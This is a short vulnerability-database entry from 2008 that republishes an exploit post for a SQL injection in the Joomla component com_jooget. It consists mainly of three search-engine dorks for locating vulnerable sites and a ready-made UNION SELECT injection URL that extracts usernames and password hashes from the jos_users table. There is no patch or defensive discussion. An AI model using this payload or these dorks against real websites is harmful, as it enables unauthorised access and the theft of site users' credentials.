joomla SQL Injection(com_jooget)

2008-02-18T00:00:00
ID SECURITYVULNS:DOC:19171
Type securityvulns
Reporter Securityvulns
Modified 2008-02-18T00:00:00

Description

joomla SQL Injection(com_jooget)

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : hackturkiye.hackturkiye@gmail.com

DORK 1 : allinurl: id "com_jooget"

DORK 2 : allinurl: detail "com_jooget"

DORK 3 : allinurl: "com_jooget"

EXPLOIT :

index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1//union//select//0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0,0,0,1,1,2,2,concat(username,0x3a,password)//from/*/jos_users/

S@BUN i AM NOT HACKER S@BUN